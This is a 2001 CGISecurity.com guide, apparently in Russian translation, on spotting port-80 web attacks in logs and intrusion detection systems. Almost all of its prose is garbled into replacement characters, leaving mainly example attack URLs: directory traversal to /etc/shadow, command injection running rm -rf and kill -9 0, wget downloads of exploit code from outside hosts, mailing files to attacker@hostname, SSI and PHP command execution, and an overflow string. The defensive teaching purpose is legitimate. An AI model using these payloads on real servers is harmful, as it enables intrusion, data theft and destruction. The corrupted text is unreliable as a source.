�����: CGISecurity.com "��������� ���� �� ���� 80: ����� �������� ���� �� ���-������� � ���-����������". I. �������� II. ����� ��������� III. ����������� ��������� IV. ������������ V. ����������������� ����������� VI. ���������� I. ��������: ���� 80 - ��� ����������� ���� ��� ���-������, � �� ����� ����� ��������� ��������� �������� ������������. ��� ���� ����� ��������� ���������� ��- ������ �����-���� ���������������� ������ � ���-�����, ��� ���� � ������ ���-�������. � ���� ��������� ��������������� ��������� ���������, ����- �������� � ���� ������, � ��� ����� ������ � ����� �����. II. ����� ���������: � ���� ������� ���������� ������� ����� ��������, ������������ ��� ���- �������������� ��� ���-����������, ��� � ���-��������. ���� ������ �����- ������ ������ �� ��� ����, ����� �������� ��� ��� ��������� ���������, ������ ����� ��� ����� ���������� ����������� ��, ��� �������� ��������- ��� ���������� � ����. ��������� ������� �� ����������� ��������� � ����- ������� ���, ������� ��������� ����� ������������ ������ ���. � ������ ������� ����� ����������� ��, ��� ���� ������������ ������ ���������, ��� ��� ��� ����� �������������� � �����. "." ".." � "..." ������� ��� �������� ����� ��������� ����� ��� ��������������� ��� ���-���������- ��, ��� � ���-��������. ����� ����������� ��������� ���������� ��� ����� ������������ �� ����������� � �������� ������ ���-������� ��� ��������� ������� � ��������, ������� ����� ���� �� ������������ ��� ���������� ���������. ����������� ��� CGI ����� ��������� ��������� ".." �������. ���� �������� ������. * http://host/cgi-bin/lame.cgi?file=../../../../etc/motd ��� ������� ���������� ����������� �� ���� "��������� ���" ������ ���- �������. ���� ��������� ����� ����������� ������������ �� ����������� �� ��������� �������� ���������� ������ ���-�������, �� �� ��������, ������ ������� ���������� ���������� ��� ��������� ���������� ����������. "%20" ������� ��� ����������������� �������� ������� �������. ��� ����, ����������� ���� �������� � ����� �����, ������ �� ��������, ��� ���� ������ ���� ���������. ��������� ���-����������, ���������� ����, ����� ��������- ���� ��� ������� � ���������� ��������, ��� ��� ���������� ���������� ���� ����. � ������ �������, ���� ������ ����� ������������ ��� ��- �������� ������. ���� �������� ������. * http://host/cgi-bin/lame.cgi?page=ls%20-al| (��� ������ ������������ ����� ���������� ������� ls -al �� ������� Unix) ������ ������������� ���������� ��������� ������� ls �� Unix � ���������� �����������. ��������, ����������� ����, ��� ������� ������ ���������� ������ ������ ������ � ����������. ��� ����� ��������� ���������� ������- �� ������ � ������ ������ ����� ������� � ����� ���� ��� ���� ��������� ����� ������� ����������. "%00" ������� ��� ����������������� �������� �������� �����. �� ����� �������������� ��� ������������ ���-�������, ���������, ��� ��� �������� ������ ��� �����. ���� �������� ������. * http://host/cgi-bin/lame.cgi?page=index.html �������������� ������ ����� ���� ���������� �������� �� ���� ������. ���� ��������� ������ �������� ���������, �� �� ���������� ������ ��� ���������� ��� ������ ���� � ���. * http://host/cgi-bin/lame.cgi?page=../../../../etc/motd ���-���������� ����� ���������� ���� ������, ��������� ��� ��������� ����� � ����� ����� ����� ������ ���������� .htm, .html, .shtml ��� ��� �����-������. ���� ����� ���������� �������� ���, ��� ��� �����- ������� ��� ����� ��� ����� ����������. ����� ��� ������� ���������� ��� ���� ������ ������������� ������������ �����������. ������ ���- ������ ����� ������� ���� �������, ����� ������ �, ��������, ������� ������ ���������� � ����� �������. * http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html ��� �������� � ����������� ������� ���������� ���������� ������, ��� ����������� ���� ���� ��������� � ��������� ����������� ���������� ����� ������. ��������� ���-���������� ���������� ������������� ���- ����� �� ������������ ������������ �����, ��������� ���� ���� ����� ����� ����� ������������ ����������. "|" ������� ��� ������ ������, ������� ����� ������������ � Unix ��� ����, ����� ��������� �������������� ������� � ���� � �� �� ����� ��� ������ ���- �� ������ �������. ������: #cat access_log| grep -F "/../" (��� ���������� �������� ����� �� ������� �������� .. , ������� ����� ������������ ����������� � �������). ����� ���� ������ ������������ ������ �� ���-������������, ��� ����� ������� ������ ������� ������� � ����� ����� IDS. ���������� ������������ ������ ������������ ����- ������� � ��� ��������� - ������� ���� ��� ���������� ����� ������ ������. ���� ��������� ��������. * http://host/cgi-bin/lame.cgi?page=../../../../bin/ls| ���� ������ ��������� ������� ls ��� ����������. ���� ������������ ������ �������� ����� ���� �������. * http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc| ���� ������ ������� ������ ������ ������ � ���������� "etc" �� ���- ���� Unix. * http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20"lame" ���� ������ ��������� ������� "cat", � ����� ������� "grep" � ����- ������ -i. ";" ������� ���� ������ ��������� �������� �� ���������� ���������� ������ � ����� ������ �� ������� Unix. ������: #id;uname -a (��� �������� ������� "id" ����� ���� ����� ��������� ������� "uname"). ����� ����� ���-���������� ����� ������������ ���� ������ �, ��������, ����� ������ ������ ������� ������� � ����� ����� IDS. ����� �� ���������� ������������ ������ ���- ��������� ����������� � ��� ��������� - ������� ���� ��� ���������� ����� ������ ������. "<" � ">" ������� ������� ���� �������� ������ ��������� ����������� � ����� �� ���- ������ ������; ������ - ��� ������� ������������ ��� ���������� ������ � ����. ������ 1: #echo "your hax0red h0 h0" >> /etc/motd (����� �������� ���������� ������� �� ������ ���������� � ���� ����). ��������� ����� ������ ������������ ������, �������� �����, ��� ������� ������� ���-�����. ���������� RDS ��������, ���������� rain.forest.puppy ����� ������������� ���������� ��� ��������� ��- �������� �� ������� �������� ���-������. ��������� attrition.org � ������� �������� ���-����� �� ����������, ���������� �� ������� ������, ��� ��������������, ��������. ������ 2: http://host/something.php=<b>Hi%20mom%20I'm%20Bold!</b> ���� ������ ���������� ������ ������������ ����� ����� ��� ������ ������� ��������. �� ������ �������� ��������, ��� ����� ��������- ���� ���� html, ������������ ������� "<" � ">". ���� ���� ��� ����� � �� ����������� ���������� ������� � �������, �� ����� ��- ������������ ��� ������������ �����, ��������, ��� ������������ ���������� �� ���-����� �����. (�������, ��� ������ ����� ������ �� ������, ��������� ���������. ������ ����� ���� ������������ ��- ��� ����������� �������� � ����������������� ��������, ��� ����� ��� �� ���� ��� ��������). "!" ������� ���� ������ ����� ������������ � SSI (��������� �������) ������. ��� ����� ����� ��������� ���������� �������� ������ ���������� � �����- ������� ������ ����� ��� ������ ������� ��������, ���� ��������� �������� ������������, ����������� �� ������. ���� �������� ������.. http://host1/something.php=<!%20--#include%20virtual="http://host2/fake-article.html"--> ��� ������ ����, ��� ����� ������� ���������. �� �������� ����� ��� ��������� ����� �� host2, �������� ��������� ������� ��� � host1. (�������, ��� ������ ����� ������ �� ������, ��������� ���������. ������ ����� ���� ������������ ����� ����������� �������� � ����- ������������� ��������, ��� ����� ��� �� ���� ��� ��������). ��� ����� ����� ��������� ��� ��������� ������� � ����� ������� � ������������ ������������, ��� ������� ������� ��� ���-������. ���� �������� ������. http://host/something.php=<!%20#<!--#exec%20cmd="id"--> ��� ������ ���������� ������� "id" �� ��������� �������. ��� ������� ������������� ������������, ������������ ���-������, ������� ������ ����� "nobody" ��� "www". ��� ����� ����� ��������� ��������� ������� ������. ���� �������� ������.. http://host/something.php=<!%20--#include%20virtual=".htpasswd"--> ��� ��������� ����� .htpasswd. ���� ���� ������ �� ������ �� ������ ��� ����, � apache ���� ����� ���������� �������, �����- ������ ������� .ht. ��� SSI ��������� ������ ���, ��� ����� �������� � ��������� ���������� ������� ������������. "<?" ������� ��� ����� ���������� ��� ������� ������� php � ��������� ���- ����������. � ����������� �� ��������� ������� � ������ ���- �����, �������� ���������� ������. ���� �������� ������.. http://host/something.php=<? passthru("id");?> � ����� ���������� ���������� php �������� ���������� ���� ������� �������� �� ��������� ����� � ������������ ��������- ����, ������������ ���-������. � ������� �� �����, ��������� ����� ������������ ���� ������ � ����������������� ��������. ����������� �������� �� ������� ����-���� ���������� � ���������� ���, ��� �������� �������- ������. "`" ������� ������ �������� ����� ����� ������������ � perl ��� �������- ��� ������. ���� ������ ������ �� ������������ � �����-���� ���������� ���-����������, ��� ��� ���� �� ������������� ��� ������������� � ����� �����, ��, ��������, ���� ��������. ���� �������� ������. http://host/something.cgi=`id` � ����� ���������� ���-���������� �� perl ��� ������ �����- ���� ������� "id". III. ����������� ���������: ���� ������ �� ������� ����� ������������ �� ��������, ����������� ���������, ������ � �������, ������� ����� ���� ���������, � ��� ����������, ��� �� ������� � ���������� ���������� ������. ���� ��� � �� ������ ������ ������ ��� ������, ������� ����� ��������� ���������, �� �������� ������� ������������� ����, ��� ����� ���- ������, ��� ��� ����� ���� ����������� ������ ����� �������. * ����� �������, ������� ����� ���� ��������� ��������� ��� ������. "/bin/ls" ��� - ������� ������� ls. ����� ����� ������������� � ������ ����� ��� ��������� ����� ��� ���-����������. ���� �� ���������� ���� ������ ���-���� � ����� �����, �� ��� ���� �������� ����� ����, ��� ���� ������� ����� ���� ���������� �������, ����������� ��������� ���������� ������. ��� �� ������ �������� �������� � ����� ���� ������ ������ ��������. ������������ ������ ���-���������� ����� ���� ��� ������ �� ���� �������. ���� ��������, ������������� ���- ���, ������������ � �����, � ��������� ����� �� ��������� �������- ���. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al| ������: http://host/cgi-bin/bad.cgi?doh=ls%20-al; "cmd.exe" ��� ��������� ������������� windows. ���� ��������� ������� ������ �� ������ ����� �������, �� �� ����� ������� ����� ������ �� win- dows ������, � ����������� �� ���� ������� �� �������. ����������� �������� ������ ����������� � ������ 80, ��������� cmd.exe ��� ����������� ������������� ������ ����� ������ ��������� ������. http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:\ "/bin/id" ��� - ������� ������� id. ����� ����� ������������� � ������ ����� ��� ��������� ����� ��� ���-����������. ���� �� ���������� ���� ������ ���-���� � ����� �����, �� ��� ���� �������� ����� ����, ��� ���� ������� ����� ���� ���������� �������, ����������� ��������� ���������� ������. ��� �� ������ �������� �������� � ����� ���� ������ ������ ��������. ������������ ������ ���-���������� ����� ���� ��� ������ �� ���� �������. ���� ��������, ������������� ���- ���, ������������ � �����, � ��������� ����� �� ��������� �������- ���. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/id| ������: http://host/cgi-bin/bad.cgi?doh=id; "/bin/rm" ��� - ������� ������� rm. ����� ����� ������������� � ������ ����� ��� ��������� ����� ��� ���-����������. ���� �� ���������� ���� ������ ���-���� � ����� �����, �� ��� ���� �������� ����� ����, ��� ���� ������� ����� ���� ���������� �������, ����������� ��������� ���������� ������. ��� �� ������ �������� �������� � ����� ���� ������ ������ ��������. ��� �������, � ������ �������, ��������� �������� ������ � �������� ����� ������� ��� ������������ ��������- �����, ��� ��� ������������� ���������. ���� ��������, �����������- �� ������, ������������ � �����, � ��������� ����� �� ��������� ��- ��������. ���� �������� ������ ����, �� ��� �� ����� ����������� ������� �� ���. ���� ��� �������� ����� � ������ stupid.txt, � ��� �� �������������� � �������� ���-�����, � �������� �� ��� ��������, �������� ���� � ������������� ���. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*| ������: http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*; ������� "wget � tftp" ��� ������� ����� ������������ ���������� � ������� ��� ���������� �������������� ������, ������� ����� �������������� ��� ��������� ���������� ���������� � �������. wget - ��� ������� Unix, ������� ����� �������������� ��� ���������� �������. tftp - ��� ������� Unix � NT, ������� ������������ ��� ���������� ������. ��������� IIS ����� ���������� ��� tftp ������� ��� ����������� ����� ���� �� ������������ ������ ���� ��� ����������� ���������������. ������: http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| ������: http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c; ������� "cat" ��� ������� ����� ������������ ��� ��������� ����������� ������. ��� ����� ���� ������������ ��� ������ ������ ����������, ����� ��� ���������������� �����, ����� �������, ����� ��������� ����, � ����� ����, ��� ��� ����� ���������. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| ������: http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd; �������"echo" ��� ������� ����� ������������ ��� ���������� ������ � ������, ����� ���, ��������, index.html. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt| ������: http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt; ������� "ps" ��� ������� ���������� ������ ���������� ���������. ��� ����� ������� ����������, �������� �� �� ��������� ����� �����-���� ����������� �����������, ��������� � �������������, � ����� ���� ��� ��������� ������������� � ������ ����� � ����������- ��, ������� ����� ����� ���� ����. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| ������: http://host/cgi-bin/bad.cgi?doh=ps%20-aux; ������� "kill � killall" ��� ������� ������������ ��� �������� ��������� �� ������� Unix. ��������� ����� ��������������� ��� ��� �������� ���- ������� ������� ��� ���������. ��������� ����� ����� ����- �������� ��� ������� ��� ��������� ����� ������, ���� ���- �����, ������������ ��, ��������� ��������� �������� ���- ������ ��� �������� �����������. ������: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| ������: http://host/cgi-bin/bad.cgi?doh=kill%20-9%200; ������� "uname" ��� ������� ����� ������������ ���������� ��� ����, ����� ������ ��� ����� ��������� �������. ����� ���-���� ������- �� � ���������� � ��� ������� ����� ���� ������������� � ���, � ������ ���������� �� ����� ����� ������. ������ ���- ���������� uname -a � ��� ����� ��������� � ����� ��� "uname%20-a". ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| ������: http://host/cgi-bin/bad.cgi?doh=uname%20-a; "cc, gcc, perl, python, ���..." ������� ������������/��������������� ������� "cc" � "gcc" ��������� ������������� ���������. ��������� ����� ������������ wget ��� tftp ��� ���������� ������, � ����� ��- ���������� ��� ����������� ��� ���������� ���������. �� ������ ����� �������� ������, ������� ��������� ������������� ����������� �������. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| ������: http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337; ���� �� ������ � ����� ������ ��������������� "perl" ��� "python", �� ������ ��������, ��� ��������� ������ ��������� perl ��� python ������ � �������� ��������������� ���������� ������������ ����� �������. ������� "mail" ��� ������� ����� �������������� ��������� ��� �������� �� ����� ������ �� �������� ����� ����������. ��� ����� ����� ��������- ������ ��� �������� �����, � ��������, ������������� ���� ������ ����� ����� �������� ����������. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@hostname%20<<%20/etc/motd| ������: http://host/cgi-bin/bad.cgi?doh=mail%[email protected]%20<</tmp/wu-2.6.1.c; ������� "xterm/������ X ����������" Xterm ����� ������������ � ����� ��������� ������� � �������� ��������� �������. ���� �� ������ ��� � ����� �����, �� ����- �� ��������� ����� �������� � �����, ��� ��� ������ �������� ��������� � ������� ������������. ����������� ���� �� ������� � ��� �������, ����������� ����� ������: "%20-display%20". ��� ��������� ����� ������������ ��� ������� xterm ��� ������ ������� X ���������� �� ��������� �����. ������: http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20-display%20192.168.22.1| ������: http://host/cgi-bin/bad.cgi?doh=Xeyes%20-display%20192.168.22.1; ������� "chown, chmod, chgrp, chsh, ���..." ��� ������� ��������� �������� ����� ������� � ������� Unix. ���� �������� ���������� ������ �� ���. chown = ��������� ���������� ��������� �����. chmod = ��������� ������������� ����� �������. chgrp = ��������� �������� ������-���������. chsh = ��������� ������������ �������� ��������, ������������ ��. ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html| ������: http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html; ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd| ������: http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh; ������: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow| * ����� �����, ������������� ���������. ���� "/etc/passwd" ���� ������� �������. ������ �� ������� � �� ������������� ������������� ������� ����������. � ������ �������, �� ���� ���������� ������������� � ������������ ������ �������������, ��������� ����� �, ��������, ��������- �� ������. ���� ���� ���� �������, ��� ������ � ����������� �������, �� ��������� ���������� ����������� ���� /etc/shadow. "/etc/master.passwd" ���� ������� BSD �������, ���������� ������������� ������. ���� ���� ��- ��� ���� �������� ������ ������������� � �������� root, �� ��������� ��- �������� ����� ��������� ���� ���� � ������� ��� ���������. ���� ���- ������ ������� ��� ������������� "root", �� ��������� ������ ��������� ���� ���� � � ���������� �������������� ���������� �������. "/etc/shadow" ��������� ���� �������, ���������� ������������� ������. ���� ���� ��- ��� ���� �������� ������ ������������� � �������� root, �� ��������� ��- �������� ����� ��������� ���� ���� � ������� ��� ���������. ���� ���- ������ ������� ��� ������������� "root", �� ��������� ������ ��������� ���� ���� � � ���������� �������������� ���������� �������. "/etc/motd" ��������� ���� "��������� ���", ���������� ������ ���������, ������� ����� ������������ ��� ����������� � ������� Unix. �� ����� ��������- ���� ������ ����������, �������, �� ������ ��������������, ������ ��- ���� ������������, ������ � ������� ������������ �������. ��������� ����� ����� ��������� ���� ���� ��� ����, ����� ������ �������� � ���- ��� ���������� ������������ �������. �� ������ ����� ��� �������� ��- ��������� �� � ������ ����������, ������� ����� �������������� ��� ��������� ����� ������� ���� ������� � �������. "/etc/hosts" ���� ���� ������������� ���������� �� ������� ip � ������� ����������. ��������� ����� ������������ ��� ���������� ��� ���������� ����� ���- ����� � ����� �������/���������� ����. "/usr/local/apache/conf/httpd.conf" ���� � ����� ����� ����������� �� ������ ��������, �� ��� �������� ��- ��� ����. ��� ���������������� ���� ���-������� Apache. �� ���� �����- ����� ������������� � ���, ����� ���-����� �������� �� �������, � ���- �� ����� ������ ����������� ���������� ������� ���������� CGI ��� SSI �������. "/etc/inetd.conf" ��� ���������������� ���� ������� inetd. � ���� ����� ����������� ���- ������ ������, �������������� ��� ���������� ������� � �������. �� ����� ����� �������� ���������� �� ��������� ������� ������ (wrapper) ��� ������� ������. ���� ������ ��������� ��� �������������, ��������� ��������� ����� �������� "/etc/hosts.allow" � "/etc/hosts.deny", � �������� ������������ ��� ����� ��� ��������� �� ����� ������� �����- �����. ".htpasswd, .htaccess, and .htgroup" ��� ����� ������������ ��� ��������� �������������� �� ���-�����. ���- ������ ���������� ����������� ���������� ���� ������ ��� ��������� ��� ���� �������������, ��� � �������. ������ ����������� � ����� htpasswd � �����������. ������� �������� ������� � ������� ������� ����������� ���������� ������ � ������������ �������� ������ ���-�����, ���������� ��������, �, ��������, ������ ������. (������ ���� ������- ���� ���� � �� �� ����� ������������� � ������ ��� �����, � ����� ����� ��������� ��� ��� ����� ���� ���������� ������ � ������ ��������, ����- ��� ����� ���� ������������.) "access_log and error_log" ��� ���-����� ���-������� apache. ��������� ����� ����� ��������� ��- �� ��� ����, ����� �������, ����� ��� ������� ���� ����������������, � ����� ��� ���������. ����� ��������� ����������� ���� � ������� ��- ��� ���������� � ��� ��� ����� �����. ����������� ��������� ��������- �� � ���� ������� ����� ���� 80 ���������� ������ ���������������, ���� ������ ��� ����� �� ���������� ��� ���� ���� �� ������� � ��� ������ �����. "[�����_�����]:\winnt\repair\sam._ ��� [�����_�����]:winnt\repair\sam" ��� ��� ����� ������� Windows NT. ��������� ����� ����� ����������� ���� ���� ���� ��������� ���������� ������ ����������. �� ������ ���- �� ������ ����������� ��������� ������� "l0pht crack" ��� ������ ��- ���� ��������� windows ������. ���� ���������� ������� �������� ��- ���� ��������������, �� ��������� ������ ������ ��������� � ��� ���- ���������. IV. ������������: � �� ��������� ����� ����������� � ������������ ������ � ���� �������- ��, �� � ������ ������� ��������� ����� ���������. ������������ ������ ����� ����� ����������� ����� ����������� � ��� ������������� ������ ������. ���� �������� ������� ������. ������: http://host/cgi-bin/helloworld?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ����� ����� ��� ��������� ������ ��������� ���� A �� ���� ���������� ��� �������� ��� �� ������� ����������� ������������ ������. �������- ����� ������ ����� ������������ ���������� ��������� ���������� ����- ��. ���� ��� suid ���������� � ���� ��� �������� - root, �� ��� ����� ���� ���������� ������ ������ � �������. � ��������� ������ � ���� ���������� ����������� ��������� ������� � ������� ������������, ��- ���������� ���-������. �������� ������������ ������ �������� �������� ���, �� � ���� ����- ����� � �� �������� ��������� ������ ��������� ������. �������� ����� ����� ���������� �������� ����� �����. ���� �� ������ �������� �����- ��, � ��� ���� ������ �������� ��������� �������, ��� ����� ���� ��- ����� �������� ��������� ����� ���������� �� ������� ����������� ��- ���������� ������, ���, ��������, ����� ������� �����, ����������� ���� ������. V. ����������������� �����������: �� ����� �����������, ���������� ���� �� ���� ����������, ��������� �����, ��� ������� IDS ����� ��������� ����� ������� ���������� ���- ��������. �������� ��������� �������� ��� ������ � ����������������� �������, ��� ����� ������� IDS ��������������� ��� ������. ������ CGI ��������� ��� Whisker ������ ������ ������. ���� ��, ������������ ���� ����, ��������� �������� ���������� ����������������� ��� ���- ������ ��������, �� ��� ����� ��������, ��� ��������� �������� ����- ������������� ���� ������� ��������� ��������. ������� ����� �������� ����, ��� ���� ������������� ��� ����������������� ��������, ����� ����������� �� �� ����� �����, � ����������� ������� � �������� ����- �� �������� ��� ��������� ������ �����. ���� �� ���������� ������� 404 �������, �� ����������������� �������� ����� ���������� � �� ���- ���� ����� ������� ��� ��� �� ������, ������ � ��� �������. ���� �� �� ������ ���������, �� ������� ������� man ascii ����������� ��� ������� ��������������� �����������. VI. ����������: � ���� ��������� �� ����������� ��� ��������� ��������� ����� 80, �� � ��� ��������������� �������� ����� ���� ����. ����� ����� ������- ���� ��, ��� ��� ���������� ��������� � ����� �����, � ������ ���� ����, ��� ����� �������� � �������� ����� IDS. �� ������� � ����� ������ �������������� ���-������� �������� ������������� �� ����� �������. � ����� �������, ��� ���� �������� ������� ���-����������- ��� ����� ������ ���-����������. � ������� ���� �������� �������� �� ��� � �����������, ��� ��� ���� � ��� ���� �����-���� ��������- ��� ��� ����������� ������ ��� �� [email protected]. ������ ��� ���������� ��������� � ������ 2001 Copyright ������ 2001 Cgisecurity.com